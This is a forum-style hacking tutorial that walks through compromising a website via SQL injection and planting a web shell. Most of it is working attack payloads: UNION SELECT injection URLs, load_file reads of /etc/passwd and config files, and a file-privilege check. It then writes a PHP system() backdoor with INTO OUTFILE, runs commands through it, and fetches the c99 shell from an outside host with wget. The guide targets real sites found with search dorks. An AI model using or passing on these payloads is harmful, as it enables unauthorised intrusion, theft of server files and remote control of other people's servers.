HOW TO UPLOAD SHELL THROUGH SQL INJECTION

1. First of all find a website which is vulnerable to sql injection you can find websites by dorks or manually XD like i have found this.
2. You need 2 main things
3. 1) Root Path of the website
4. 2) A Writable Directory
5. If the vulnerable website does'nt show the root path then don't worry i will tell you how to know the root path. :D
6. And Also Writeable Directory.
7.  
8. www.site.com/index.php?id=10'
9.  
10.  
11. I am not starting with abc of sqli hope u know the basics :D
12. Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column
13.  
14. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
15.  
16. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
17.  
18. Let's Try To Load Files Of The Website
19.  
20. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
21. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
22. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
23. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
24. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
25.  
26. We Won't Need To Read Any Files Mentioned above just to increase your knowledge :D
27. Now we have to checked the file privilage for the current user for this first you have to find current username.
28. Like This
29.  
30. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
31.  
32. Our Current Username is etc mine is Ch3rn0by1
33. Now Check File Privilages for User Ch3rn0by1
34.  
35. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
36.  
37. If it shows Y (yes) on the vulnerable column of the website that means we have the file privilages for the current user Ch3rn0by1
38. And if it is'nt shows Y than Dont waste your time there :D
39.  
40. Ok Now we have to know the root path :D for this we have to know the software which is used in the server
41. you can use havij and etc/passwd and many more softwares etc/passwd is'nt a software LOL
42. To know the server software by file etc/passwd use this query
43.  
44. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--
45.  
46. now we have our server software etc (/home/Ch3rn0by1)
47. now read one more file.
48.  
49. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
50.  
51. Where Ch3rn0by1 is your server software name like server name.conf :D
52.  
53. now we have the root path
54.  
55. /home/site.com/public_html etc.
56.  
57. Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
58.  
59. site www.site.com/dir/*/*/*/*/
60.  
61. so its site.com/ch3rn0by1/writeable
62.  
63. now we will upload our evil code
64.  
65. www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
66. ok now we have to execute our commands
67. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
68. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
69.  
70. Now we will use wget command to upload our evil script
71.  
72. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
73.  
74. Now we will rename our c99.txt to php in order to execute it :D
75.  
76. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
77.  
78. now open it
79.  
80. www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
81.  
82. Credits to Pak Cyber World <--- Thank You i always support your work that is done